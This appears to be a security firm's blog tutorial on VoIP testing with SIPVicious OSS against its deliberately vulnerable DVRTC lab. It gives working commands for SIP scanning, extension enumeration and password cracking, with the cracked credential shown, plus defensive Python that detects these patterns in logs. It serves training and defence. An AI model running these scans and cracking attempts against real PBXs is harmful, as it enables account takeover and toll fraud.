---
title: SIPVicious tutorial: testing VoIP security with DVRTC
date: 2026-04-13
url: /blog/sipvicious-tutorial-voip-security-testing-with-dvrtc.md
---

## TL;DR

We use [SIPVicious OSS](https://github.com/enablesecurity/sipvicious) to scan, enumerate extensions, and crack passwords on our [DVRTC](https://github.com/EnableSecurity/DVRTC/) vulnerable lab at `pbx1.dvrtc.net`. If you want to get your hands dirty with VoIP security testing, this is a good place to start.

## Background

Back in 2020, our colleague Pinaki wrote a [tutorial on attacking a VoIP system with SIPVicious OSS](https://www.enablesecurity.com/blog/attacking-real-voip-system-with-sipvicious-oss.md) using our old demo server at `demo.sipvicious.pro`. That server has since been retired.

We now have something much better: [DVRTC (Damn Vulnerable Real-Time Communications)](https://www.enablesecurity.com/blog/introducing-dvrtc-damn-vulnerable-real-time-communications.md), a full vulnerable VoIP/WebRTC lab with guided exercises and a public instance at [pbx1.dvrtc.net](https://pbx1.dvrtc.net). DVRTC packs Kamailio, Asterisk, rtpengine, coturn, and more, all intentionally misconfigured for training purposes.

This post focuses on the SIPVicious OSS basics. For the full range of exercises (RTP bleed, TURN abuse, digest leak, and more), check the [DVRTC exercise docs](https://github.com/EnableSecurity/DVRTC/blob/main/docs/pbx1/exercises/).

## Getting started

SIPVicious OSS (SVOSS) is [freely available](https://github.com/enablesecurity/sipvicious) on our [GitHub](https://github.com/enablesecurity). Install it with:

```bash
pip install sipvicious
```

Make sure you have the latest version (v0.3.7 at time of writing):

```bash
sipvicious_svmap --version
```

You'll need Python 3.6 or later. For full details, see the [installation wiki](https://github.com/EnableSecurity/sipvicious/wiki/Basics#installation).

## Reconnaissance with svmap

The first step in any [VoIP pentest](https://www.enablesecurity.com/voip-penetration-testing.md) is figuring out what we're dealing with. Let's map our target with `svmap`:

```bash
sipvicious_svmap pbx1.dvrtc.net
```

```
+---------------------+---------------------------------+
| SIP Device          | User Agent                      |
+=====================+=================================+
| 139.162.183.14:5060 | kamailio (6.1.1 (x86_64/Linux)) |
+---------------------+---------------------------------+
```

So we have a Kamailio 6.1.1 server handling SIP over UDP, sitting in front of the rest of the stack as a SIP proxy.

Now, what happens when we target a specific extension? Let's try `1000`:

```bash
sipvicious_svmap pbx1.dvrtc.net -e 1000
```

```
+---------------------+---------------------------------------------+
| SIP Device          | User Agent                                  |
+=====================+=============================================+
| 139.162.183.14:5060 | Asterisk PBX 22.8.2+dfsg+~cs6.15.60671435-1 |
+---------------------+---------------------------------------------+
```

A completely different User-Agent! The request for extension `1000` gets routed through Kamailio to an Asterisk PBX behind it. This is a pretty standard SIP proxy + PBX deployment. From a pentester's perspective, knowing what sits behind the proxy is valuable information, and here the User-Agent on the routed response gives it away.

## Enumerating extensions with svwar

Now that we have a feel for the target, let's enumerate the extensions with `svwar`:

```bash
sipvicious_svwar pbx1.dvrtc.net -e 1000-2000
```

```
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 1000      | reqauth        |
+-----------+----------------+
| 1100      | reqauth        |
+-----------+----------------+
| 1200      | reqauth        |
+-----------+----------------+
| 1300      | reqauth        |
+-----------+----------------+
| 2000      | reqauth        |
+-----------+----------------+
```

`svwar` found 5 extensions, all requiring authentication. It works by sending SIP REGISTER requests and looking at what comes back: a `401` means the extension exists (but needs credentials), while a `404` means it doesn't. In fact, if you run `svwar` with the `-vv` flag, you'll notice the server responds with `404 enumerate me baby` for invalid extensions. Yes, that's intentional ;-)

## Cracking passwords with svcrack

We have extensions, so the obvious next question is: do any of them have weak passwords? That's what `svcrack` is for. Let's try the default numeric range first:

```bash
sipvicious_svcrack pbx1.dvrtc.net -u 1000 -v
```

```
INFO:ASipOfRedWine:trying to get self ip .. might take a while
INFO:root:scan started at 2026-04-12 16:25:39.014348
INFO:ASipOfRedWine:no more passwords
WARNING:root:found nothing
INFO:root:Total time: 0:00:18.189742
```

Nothing. The default password set is a numeric range from 100 to 999, which isn't large enough. Let's try the `--enabledefaults` flag, which adds common passwords (including the extension number itself and predictable patterns):

```bash
sipvicious_svcrack pbx1.dvrtc.net -u 1000 --enabledefaults -v
```

```
INFO:ASipOfRedWine:trying to get self ip .. might take a while
INFO:root:scan started at 2026-04-12 16:25:12.235809
INFO:ASipOfRedWine:The password for 1000 is 1500
INFO:root:we have 1 cracked users
INFO:root:Total time: 0:00:00.168962
+-----------+----------+
| Extension | Password |
+===========+==========+
| 1000      | 1500     |
+-----------+----------+
```

There we go! Extension `1000` has a password of `1500`. You could also find this by specifying a custom numeric range with `--range`:

```bash
sipvicious_svcrack pbx1.dvrtc.net -u 1000 --range 1000-2000 -v
```

```
INFO:ASipOfRedWine:trying to get self ip .. might take a while
INFO:root:scan started at 2026-04-12 16:25:25.094604
INFO:ASipOfRedWine:The password for 1000 is 1500
INFO:root:we have 1 cracked users
INFO:root:Total time: 0:00:04.524195
+-----------+----------+
| Extension | Password |
+===========+==========+
| 1000      | 1500     |
+-----------+----------+
```
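Seen from the defending side, the `svwar` and `svcrack` runs above leave a recognisable pattern in REGISTER results: one source touching many extensions, or one extension collecting many authentication failures. The detection logic below is an added example, not code from SIPVicious or DVRTC; the event tuple format, the thresholds and the sample data are assumptions constructed for illustration.

```python
from collections import defaultdict

# Constructed sample data (not real DVRTC logs): one tuple per REGISTER
# transaction as (epoch_seconds, source_ip, extension, final_status).
def build_sample():
    events = []
    # 192.0.2.10 walks 60 extensions in about 6 seconds (svwar-like).
    for i in range(60):
        status = 401 if i == 0 else 404
        events.append((100 + i * 0.1, "192.0.2.10", str(1000 + i), status))
    # 192.0.2.20 fails authentication 40 times on one extension (svcrack-like).
    for i in range(40):
        events.append((200 + i * 0.05, "192.0.2.20", "1000", 401))
    # 198.51.100.5 is a normal phone: one challenge, then successful registers.
    events += [(300, "198.51.100.5", "1100", 401),
               (300.2, "198.51.100.5", "1100", 200),
               (330, "198.51.100.5", "1100", 200)]
    return events

def detect(events, window=60.0, max_exts=20, max_fails=10):
    """Return {source_ip: set of finding names}, using a sliding window per source."""
    by_src = defaultdict(list)
    for ts, src, ext, status in sorted(events):
        by_src[src].append((ts, ext, status))
    findings = defaultdict(set)
    for src, rows in by_src.items():
        start = 0
        for end in range(len(rows)):
            # Drop rows that fell out of the time window.
            while rows[end][0] - rows[start][0] > window:
                start += 1
            win = rows[start:end + 1]
            # Many distinct extensions from one source: enumeration.
            if len({ext for _, ext, _ in win}) > max_exts:
                findings[src].add("extension-enumeration")
            # Many 401/403 results for a single extension: password guessing.
            fails = defaultdict(int)
            for _, ext, status in win:
                if status in (401, 403):
                    fails[ext] += 1
            if any(n > max_fails for n in fails.values()):
                findings[src].add("password-guessing")
    return dict(findings)

if __name__ == "__main__":
    for src, names in sorted(detect(build_sample()).items()):
        print(src, sorted(names))
```

A legitimate phone produces a single `401` challenge before its `200`, so it stays under both thresholds; tune `window`, `max_exts` and `max_fails` to the registration behaviour of your own endpoints.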

## What can an attacker do with SIP credentials?

On a production PBX connected to PSTN, the most common outcome is toll fraud: the attacker registers with the stolen extension and starts making international or premium-rate calls. The victim gets stuck with the phone bill. We've seen cases where this leads to tens of thousands in charges over a weekend. It's been happening for years and it's still one of the most common VoIP attacks.

DVRTC is not connected to PSTN (of course), so no expensive calls here. But the techniques are the same ones an attacker would use against a real target.

## Going further

This tutorial only covers the basics. DVRTC has [7 exercises](https://github.com/EnableSecurity/DVRTC/blob/main/docs/pbx1/exercises/) covering 12 attack paths, including traffic analysis, RTP bleed, SIP digest leak, TURN relay abuse, and offline credential cracking. You can also [run your own DVRTC instance](https://github.com/EnableSecurity/DVRTC/) locally with Docker Compose if you want a private lab to experiment with.

Of course, if what you actually need is a professional [VoIP penetration testing](https://www.enablesecurity.com/voip-penetration-testing.md) service, [get in touch](https://www.enablesecurity.com/contact.md) ;-)

